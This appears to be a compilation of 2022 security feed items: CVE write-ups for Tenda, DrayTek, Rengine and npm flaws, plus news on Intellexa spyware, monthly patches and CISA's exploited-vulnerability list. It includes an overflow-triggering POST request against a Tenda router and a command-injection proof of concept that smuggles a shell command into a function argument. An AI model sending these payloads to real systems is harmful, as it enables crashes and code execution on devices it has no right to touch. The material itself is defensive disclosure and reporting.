Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the list parameter at /goform/setPptpUserList.

**Tenda AC9 Wireless Router /goform/setPptpUserList list Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: A buffer overflow vulnerability exists in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/setPptpUserList implementation has a security vulnerability in the processing of list POST parameters, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of exploit
        *   Permission Constraints: identity authentication is required
        *   User Interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/setPptpUserList HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 2048
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/setPptpUserList component implements a security vulnerability in processing the list POST parameter. The length of the list parameter can be any length and is placed on the stack without checking, resulting in stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

CVE-2022-36568: IoTvuln/tenda_ac9_setPptpUserList.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the deviceList parameter at /goform/setMacFilterCfg.

CVE-2022-36569: IoTvuln/tenda_ac9_setMacFilterCfg.md at main · CyberUnicornIoT/IoTvuln

The application manage_website.php on Garage Management System 1.0 is vulnerable to Shell File Upload. The already authenticated malicious user, can upload a dangerous RCE or LCE exploit file.

**Description:**

The application manage\_website.php on Garage-Management-System-1.0 is vulnerable to Shell File Upload. The already authenticated malicious user can upload a very dangerous RCE or LCE exploit file.  
After this attack, he can share a lot of sensitive information or he can do more very bad things with this system. No matter what host it is, internal or external.

Status: Highly Vulnerable

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-37184: CVE-nu11secur1ty/vendors/mayuri_k/2022/Garage-Management-System-1.0-SFU at main · nu11secur1ty/CVE-nu11secur1ty

Rengine v1.3.0 was discovered to contain a command injection vulnerability via the scan engine function.

https://github.com/yogeshojha/rengine

The rce vulnerability is caused by the code reading the value from the yaml file and splicing it directly into the os.system statement.

github permark

\====================  
If you try to reproduce the vulnerability, add the command you want to execute in the scan engine template in the background, then create a target and select the scan engine template for scanning. After a while, you will find that the command is successfully executed.

CVE-2022-36566: There is an OS Command Injection vulnerability in the scan engine function configuration of rengine 1.3.0 · Issue #2 · zongdeiqianxing/rengine

By Deeba Ahmed
The proposal documents were leaked on a Russian hacking forum showing Intellexa is offering remote data extraction from Android and iOS devices in exchange for $8 million.
This is a post from HackRead.com Read the original post: European Spyware Vendor Intellexa Offering Android, iOS Device Exploits

Intellexa is a spyware firm based and regulated in Europe. The company has six offices and R&D Labs spread across the EU. It has emerged as the rival of **NSO Group**, the company behind the infamous **Pegasus spyware** since, reportedly, the company is offering Android and iOS hacking services for $8 million. 

The company, founded by entrepreneur Tal Dilian, claims that it helps intelligence and law enforcement agencies across the globe with its “best-in-class Nebula platform.” Last year, Citizen Lab published a report on **Cytrox’s Predator iPhone spyware**, in which Intellexa was mentioned. The spyware was used to target a lawmaker in Greece, and reportedly, Cytrox was linked to the Intellexa Alliance.

On August 24th, 2022, malware source code providing platform Vx-Underground came across some undated leaked documents containing details of a proposal by Intellexa to offer remote data extraction from Android and iOS devices in exchange for money. In its tweet followed by leaked documents screenshots, Vx-Underground **noted** that:

> “Leaked Documents Online Show $8,000,000 iOS Remote Code Execution Zero Day Exploit.”

Intellexa’s offer includes ten infections for **Android and iOS devices** and The Magazine of 100 Successful Infections. The documents are titled Proprietary and Confidential, which revealed that the exploits work on iOS 15.4.1 and Android 12 updates.

It is worth noting that iOS 15.4.1 was **released** in March 2022, and this offer includes exploits for this version, so Intellexa must have offered this package recently.

So far, Apple has released three security updates since the mobile operating system release, so presumably, the iPhone maker has patched multiple **0-day vulnerabilities** possibly exploited by Intellexa. However, it is also possible that the exploits it is offering may remain unpatched.

Researchers say that Intellexa is asking for $8 million for an iOS exploit. The offer is valid for a platform including stolen data analysis and a 12-month warranty.

As per Vx-Underground, although the documents have no date, the screenshots it received were posted on a Russian hacking forum on 14th July 2022.

1.  **Israeli Spyware Vendor Uses Chrome 0day to Target Journalists**
2.  **Thousands of firms hit by Beapy malware using NSA hacking tools**
3.  **Amnesty Intl. accuses Indian cyber security firm of spyware attacks**
4.  **Novel Confucius Android spyware hits military, nuclear entities in Pakistan**
5.  **Musk confirms Russian hacker tried hiring Tesla worker for malware attack**

European Spyware Vendor Intellexa Offering Android, iOS Device Exploits

Plus: Chrome patches another zero-day flaw, Microsoft closes up 100 vulnerabilities, Android gets a significant patch, and more.

August was a bumper month for security patches, with Apple, Google, and Microsoft among the firms issuing emergency fixes for already exploited vulnerabilities. The month also saw some big fixes arriving from the likes of VMWare, Cisco, IBM, and Zimbra.

Here’s everything you need to know about the important security fixes issued in August.

Apple iOS 15.6.1

After a two-month patch hiatus, followed by multiple fixes in July, Apple released an emergency security update in August with iOS 15.6.1. The iOS update fixed two flaws, both of which were being used by attackers in the wild.

It is thought that the vulnerabilities in WebKit (CVE-2022-32893) and the Kernel (CVE-2022-32894) were being chained together in attacks, with serious consequences. A successful attack could allow an adversary to take control of your iPhone and access your sensitive files and banking details.

Combining the two flaws “typically provides all the functionality needed to mount a device jailbreak,” bypassing almost all Apple-imposed security restrictions, Paul Ducklin, a principal research scientist at Sophos, wrote in a blog analyzing the vulnerabilities. This would potentially allow adversaries to “install background spyware and keep you under comprehensive surveillance,” Ducklin explained.

Apple always avoids giving out details about vulnerabilities until most people have updated, so it’s hard to know who the attack targets were. To ensure you are safe, you should update your devices to iOS 15.6.1 without delay.

Apple also released iPadOS 15.6.1, watchOS 8.7.1, and macOS Monterey 12.5.1, all of which you should update at the next opportunity.

Google Chrome

Google released a security update in August to fix its fifth zero-day flaw this year. In an advisory, Google listed 11 vulnerabilities fixed in August. The patches include a use-after-free flaw in FedCM—tracked as CVE-2022-2852 and rated as critical—as well as six highly rated issues and three classed as having a medium impact. One of the highly rated vulnerabilities has been exploited by attackers, CVE-2022-2856.

Google hasn’t provided any detail about the exploited flaw, but since attackers have gotten ahold of the details, it’s a good idea to update Chrome now.

Earlier in August, Google released Chrome 104, fixing 27 vulnerabilities, seven of which were rated as having a high impact.

Google Android

The August Android security patch was a hefty one, with dozens of fixes for serious vulnerabilities, including a flaw in the framework that could lead to local privilege escalation with no additional privileges needed. Meanwhile, an issue in the media framework could lead to remote information disclosure, and a flaw in the system could lead to remote code execution over Bluetooth. A vulnerability in kernel components could also lead to local escalation of privileges.

The Android security patch was late in August, but it’s now available on such devices as Google’s Pixel range, the Nokia T20, and Samsung Galaxy devices (including the Galaxy S series, Galaxy Note series, Galaxy Fold series, and Galaxy Flip series).

Microsoft

Microsoft’s August Patch Tuesday fixed over 100 security flaws, of which 17 are rated as critical. Among the fixes was a patch for an already exploited flaw tracked as CVE-2022-34713, also known as DogWalk.

The remote code execution (RCE) flaw in the Windows Support Diagnostic Tool (MDST) is rated as having a high impact because exploiting it can result in a system compromise. The vulnerability, which affects all users of Windows and Windows Server, was first exposed over two years ago in January 2020, but Microsoft didn’t consider it a security issue at the time.

VMWare

VMWare fixed a bunch of flaws in August, including a critical authentication bypass bug tracked as CVE-2022-31656. On releasing the patch, the software firm warned that public exploit code is available.

VMWare also fixed an RCE vulnerability in VMware Workspace ONE Access, Identity Manager, and Aria Automation (formerly vRealize Automation), tracked as CVE-2022-31658 with a CVSS score of eight. Meanwhile, a SQL injection RCE vulnerability found in VMware Workspace ONE Access and Identity Manager also got a CVSS score of eight. Both require an attacker to have administrator and network access before they can trigger remote code execution.

Apple Fixed a Serious iOS Security Flaw—Have You Updated Yet?

Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs

Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs

The rush to patch systems affected by the landmark Log4Shell vulnerability has coincided with a wider improvement in patching rates for the most critical flaws, a report has found.

The remote code execution (RCE) flaw in Apache Log4j (CVE-2021-44228), the near-ubiquitous open source Java logging utility, sent organizations across the ecosystem scrambling to fix applications or patch systems after it emerged in December 2021.

Eight months on, the 2022 Trustwave SpiderLabs Telemetry Report has concluded that organizations “finally understand the necessity of having a solid security posture”.

RECOMMENDED Graph-based JavaScript bug scanner discovers more than 100 zero-days in Node.js libraries

Shodan searches performed by Trustwave SpiderLabs researchers revealed a sharp fall in the proportion of affected instances vulnerable to 2022’s highest profile vulnerabilities versus 2021’s equivalent flaws.

“Vulnerability disclosure-to-patch times have decreased,” Alex Rothacker, director of research and security scanning at Trustwave, told The Daily Swig.

**Celebrity factor**

He also noticed that security flaws’ “level of celebrity” was tied to both patching rates and patching speeds, with Log4j and Spring Framework instances outscoring what Rothacker said are lower profile issues in F5’s BIG-IP and Atlassian’s Confluence on these fronts.

For instance, only 0.36% of 405,993 instances of the most popular products running Log4j were vulnerable to the first Log4Shell patch (as opposed to the subsequent bypass) six months after exploits surfaced.

Equivalent numbers were 0.075% of 452,520 instances running unpatched versions of Spring Framework, another popular open source Java component, in regard to ‘Spring4Shell’ (CVE-2022-22965) three months after its disclosure.

Instances vulnerable to RCEs in F5’s BIG-IP (CVE-2022-1388) and Atlassian Confluence Server and Data Center (CVE-2022-26134) were 2.73% of 1,719 after disclosure and 4.44% of 7,074 hosts respectively – although disclosure was much more recent in these cases.

Catch up on the latest Log4j vulnerability news

By contrast, Trustwave’s 2021 report found that more than 50% of instances were vulnerable in relation to each of three similarly impactful vulnerabilities, weeks or months after patch release.

“Log4Shell seems to have been a call to action for many organizations,” said Rothacker. “The volume of questions and requests for remediation help that we received from customers for Log4Shell was unprecedented.”

**Critical mass**

This year is on course to comfortable eclipse 2021 in terms of both number of CVEs published and the proportion of which that are critical, the report found.

For instance, Rothacker said that August has already surpassed all previous months in 2022 and 2021, with 3,779 CVEs published as of August 26, while July and June also saw high numbers of 2,226 and 2,377 respectively.

Critical vulnerabilities account for 18% of 2022 CVEs, up from 13% of CVEs in 2021.

The report also discovered that some affected instances were still vulnerable to CVEs dating back as far as 2016, with the most widespread bug being CVE-2017-15906, an issue in encrypted remote login tool OpenSSH.

Despite being distributed in most Linux distributions by default, the bug’s medium severity means “it is most likely that many organizations do not see it as a significant issue and are de-prioritizing fixing it” said Rothacker.

“Other listed vulnerabilities either are for less commonly deployed software e.g CVE-2018-15199, or do have other mitigations, or constraints e.g CVE-2018-1312, that make it less likely that they will be exploited,” he added.

The top three CWE classifications for 2022 are cross-site scripting (XSS), SQL injection, and out-of-bounds write bugs.

RELATED CWE Top 25: These are the most dangerous software weaknesses of 2022

Log4Shell legacy? Patching times plummet for most critical vulnerabilities – report

An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.

**Summary**

The Trellix Threat Labs Vulnerability Research team has found an unauthenticated remote code execution vulnerability, filed under CVE-2022-32548 affecting multiple DrayTek routers. The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration. The attack can lead to a full compromise of the device and may lead to a network breach and unauthorized access to internal resources. All the affected models have a patched firmware available for download on the vendor’s website.

**Introduction**

DrayTek is a Taiwanese company that manufactures Small Office and Home Office (SOHO) routers with a wide adoption in the UK, Vietnam, Taiwan, etc. (src: Shodan).

**Figure 1. Shodan search showing DrayTek devices used throughout the world**

With many businesses implementing work from home policies over the last two years, these affordable devices offer an easy way for Small and Medium Sized Businesses (SMBs) to provide VPN access to their employees. For this reason, we decided to look into the security of one of their flagship products, the Vigor 3910, and found a pre-authentication remote code execution vulnerability affecting the Vigor 3910 and 28 other DrayTek models sharing the same codebase (see Affected Devices below). Exploiting this vulnerability can lead to a complete compromise of the device and can enable a malicious actor to access internal resources of the breached networks.

During our research we uncovered over 200k devices which have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited. Many more devices where the affected service is not exposed externally are still vulnerable to a one-click attack from the LAN. This vulnerability is tracked by MITRE as CVE-2022-32548 with a CVSS 3.0 score of 10.0. A patch has already been released by the manufacturer. If you or your organization are managing DrayTek devices, we recommend that you visit the manufacturer website and apply the patch as soon as possible.

We also applaud DrayTek for their great responsiveness and the release of a patch less than 30 days after we disclosed the vulnerability to their security team. This type of responsiveness and relationship shows true organization maturity and drive to improve security across the entire industry.

**Figure 2. A DrayTek Vigor 3910**

**Vulnerable devices**

The vulnerable devices are as follow:

Vigor3910 < 4.3.1.1  
Vigor1000B < 4.3.1.1  
Vigor2962 Series < 4.3.1.1  
Vigor2927 Series < 4.4.0  
Vigor2927 LTE Series < 4.4.0  
Vigor2915 Series < 4.3.3.2  
Vigor2952 / 2952P < 3.9.7.2  
Vigor3220 Series < 3.9.7.2  
Vigor2926 Series < 3.9.8.1  
Vigor2926 LTE Series < 3.9.8.1  
Vigor2862 Series < 3.9.8.1  
Vigor2862 LTE Series < 3.9.8.1  
Vigor2620 LTE Series < 3.9.8.1  
VigorLTE 200n < 3.9.8.1  
Vigor2133 Series < 3.9.6.4  
Vigor2762 Series < 3.9.6.4  
Vigor165 < 4.2.4  
Vigor166 < 4.2.4  
Vigor2135 Series < 4.4.2  
Vigor2765 Series < 4.4.2  
Vigor2766 Series < 4.4.2  
Vigor2832 < 3.9.6  
Vigor2865 Series < 4.4.0  
Vigor2865 LTE Series < 4.4.0  
Vigor2866 Series < 4.4.0  
Vigor2866 LTE Series < 4.4.0  

**Impact**

The compromise of a network appliance such as the Vigor 3910 can lead to the following outcomes (the following is a non-exhaustive list presented in no particular order):

*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)
*   Access to the internal resources located on the LAN that would normally require VPN-access or be present “on the same network”
*   Man in the middle of the network traffic
*   Spying on DNS requests and other unencrypted traffic directed to the internet from the LAN through the router
*   Packet capture of the data going through any port of the router
*   Botnet activity (DDoS, hosting malicious data, etc.)
*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)

Failed exploitation attempts can lead to:

*   Reboot of the device
*   Denial of Service of affected devices
*   Other possible abnormal behavior

Trellix Threat Labs is not currently aware of any signs of exploitation of this vulnerability in the wild; however, DrayTek devices were recently targeted by various known malicious actors. This was highlighted in the CISA’s memo on the People Republic of China (PRC) compromising SOHO routers and the report from Black Lotus Labs on the ZuoRAT exploiting the Vigor 3900 (end-of-life device replaced by the Vigor 3910). The nature of CVE-2022-32548 makes it harder to exploit compared to past vulnerabilities affecting DrayTek devices, which may hinder threat actors from quickly adopting this vulnerability into their attack frameworks.

**Demo video**

The following demo video highlights how an attacker could compromise a Draytek router and pivot to internal resources in a mock-network we’ve created.

**Technical details**

The web management interface of the vulnerable DrayTek devices is affected by a buffer overflow on the login page at **/cgi-bin/wlogin.cgi.** An attacker may supply carefully crafted username and/or password as base64 encoded strings inside the fields **aa** and **ab** of the login page. This would cause the buffer overflow to trigger due to a logic bug in the size verification of these encoded strings. By default, this attack is reachable on the LAN and may be reachable via the internet (WAN) as well if the user has enabled remote web management on their device. The consequence of this attack is a takeover of the so called “DrayOS” that implements the router functionalities. On devices that have an underlying Linux operating system (such as the Vigor 3910) it is then possible to pivot to the underlying operating system and establish a reliable foothold on the device and local network. Devices that are running the DrayOS as a bare-metal operating system will be harder to compromise as it requires that an attacker has better understanding of the DrayOS internals.

We will release more details as of how this bug was found and exploited in our upcoming talk at Hexacon on October 14-15, 2022 and the follow-up blog post that we will publish alongside the presentation.

**Detection**

Exploitation attempts can be detected by logging/alerting when a malformed base64 string is sent via a POST request to the **/cgi-bin/wlogin.cgi** end-point on the web management interface router. Base64 encoded strings are expected to be found in the **aa** and **ab** fields of the POST request. Malformed base64 strings indicative of an attack would have an abnormally high number of %3D padding. Any number over three should be considered suspicious.

The Trellix Network Security Platform has additionally released rules for exploitation attempts of this vulnerability under the identifier, _DrayTek CVE-2022-32548 Buffer Overflow Attempt._

**Recommendation**

We provide the following recommendations to those potentially affected by a vulnerable DrayTek router:

*   Make sure the latest firmware is deployed to your device. You can find the latest firmware by visiting the website of the manufacturer.
*   In the management interface of the device, verify that port mirroring, DNS settings, authorized VPN access and any other relevant settings have not been tampered with.
*   Do not expose the management interface to the Internet unless absolutely required. If you do, make sure you enable 2FA and IP restriction to minimize the risk of an attack.
*   Change the password of affected devices and revoke any secret stored on the router that may have been leaked.

**Conclusion**

Edge devices, such as the Vigor 3910 router, live on the boundary between internal and external networks. As such they are a prime target for cybercriminals and threat actors alike. Remotely breaching edge devices can lead to a full compromise of the businesses’ internal network. This is why it is critical to ensure these devices remain secure and updated and that vendors producing edge devices have processes in place for quick and efficient response following vulnerability disclosure, just as DrayTek did. Stay tuned for our next article on DrayTek routers where we will present the process used to uncover this vulnerability.

_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy | Trellix. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability._

CVE-2022-32548: Unauthenticated Remote Code Execution in a Wide Range of DrayTek Vigor Routers

All versions of package @pendo324/get-process-by-name are vulnerable to Arbitrary Code Execution due to improper sanitization of getProcessByName function.



Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-PENDO324GETPROCESSBYNAME-2419094
    
*   **published**
    
    28 Aug 2022
    
*   **disclosed**
    
    7 Mar 2022
    
*   **credit**
    
    Feng Xiao, Zhongfu Su
    

**How to fix?**

There is no fixed version for @pendo324/get-process-by-name.

**Overview**

@pendo324/get-process-by-name is a Returns a list of processes that match a process name

Affected versions of this package are vulnerable to Arbitrary Code Execution due to improper sanitization of getProcessByName function.

**PoC**

    const { getProcessByName } = require('@pendo324/get-process-by-name');
    getProcessByName("python\" && echo \"1\"> rce.txt # "")

CVE-2022-25644: Snyk Vulnerability Database | Snyk

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including a high-severity security flaw affecting industrial automation software from Delta Electronics.
The issue, tracked as CVE-2021-38406 (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including a high-severity security flaw affecting industrial automation software from Delta Electronics.

The issue, tracked as CVE-2021-38406 (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful exploitation of the flaw may lead to arbitrary code execution.

"Delta Electronics DOPSoft 2 lacks proper validation of user-supplied data when parsing specific project files (improper input validation) resulting in an out-of-bounds write that allows for code execution," CISA said in an alert.

It's worth noting that CVE-2021-38406 was originally disclosed as part of an industrial control systems (ICS) advisory published in September 2021.

However, there are no patches that address the vulnerability, with CISA noting that the "impacted product is end-of-life and should be disconnected if still in use." Federal Civilian Executive Branch (FCEB) agencies are mandated to follow the guideline by September 15, 2022.

Not much information is available about the nature of the attacks that exploit the security bug, but a recent report from Palo Alto Networks Unit 42 pointed out instances of in-the-wild attacks leveraging the flaw between February and April 2022.

The development adds weight to the notion that adversaries are getting faster at exploiting newly published vulnerabilities when they are first disclosed, leading to indiscriminate and opportunistic scanning attempts that aim to take advantage of delayed patching.

These attacks often follow a specific sequence for exploitation that involves web shells, crypto miners, botnets, and remote access trojans (RATs), followed by initial access brokers (IABs) that then pave the way for ransomware.

Among other actively exploited flaws added to the list are as follows -

*   **CVE-2022-26352** - dotCMS Unrestricted Upload of File Vulnerability
*   **CVE-2022-24706** - Apache CouchDB Insecure Default Initialization of Resource Vulnerability
*   **CVE-2022-24112** - Apache APISIX Authentication Bypass Vulnerability
*   **CVE-2022-22963** - VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability
*   **CVE-2022-2294** - WebRTC Heap Buffer Overflow Vulnerability
*   **CVE-2021-39226** - Grafana Authentication Bypass Vulnerability
*   **CVE-2020-36193** - PEAR Archive\_Tar Improper Link Resolution Vulnerability
*   **CVE-2020-28949** - PEAR Archive\_Tar Deserialization of Untrusted Data Vulnerability

**iOS and macOS flaw added to the list**

Another high-severity flaw added to the KEV Catalog is **CVE-2021-31010** (CVSS score: 7.5), a deserialization issue in Apple's Core Telephony component that could be leveraged to circumvent sandbox restrictions.

The tech giant addressed the shortcoming in iOS 12.5.5, iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 (and Security Update 2021-005 Catalina), and watchOS 7.6.2 released in September 2021.

While there were no indications that the flaw was being exploited at the time, the tech giant appears to have silently revised its advisories on May 25, 2022 to add the vulnerability and confirm that it had indeed been abused in attacks.

"Apple was aware of a report that this issue may have been actively exploited at the time of release," the tech giant noted, crediting Citizen Lab and Google Project Zero for the discovery.

The September update is also notable for remediating CVE-2021-30858 and CVE-2021-30860, both of which were employed by NSO Group, the makers of the Pegasus spyware, to get around the operating systems' security features.

This raises the possibility that CVE-2021-31010 may have been stringed together with the aforementioned two flaws in an attack chain to escape the sandbox and achieve arbitrary code execution.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce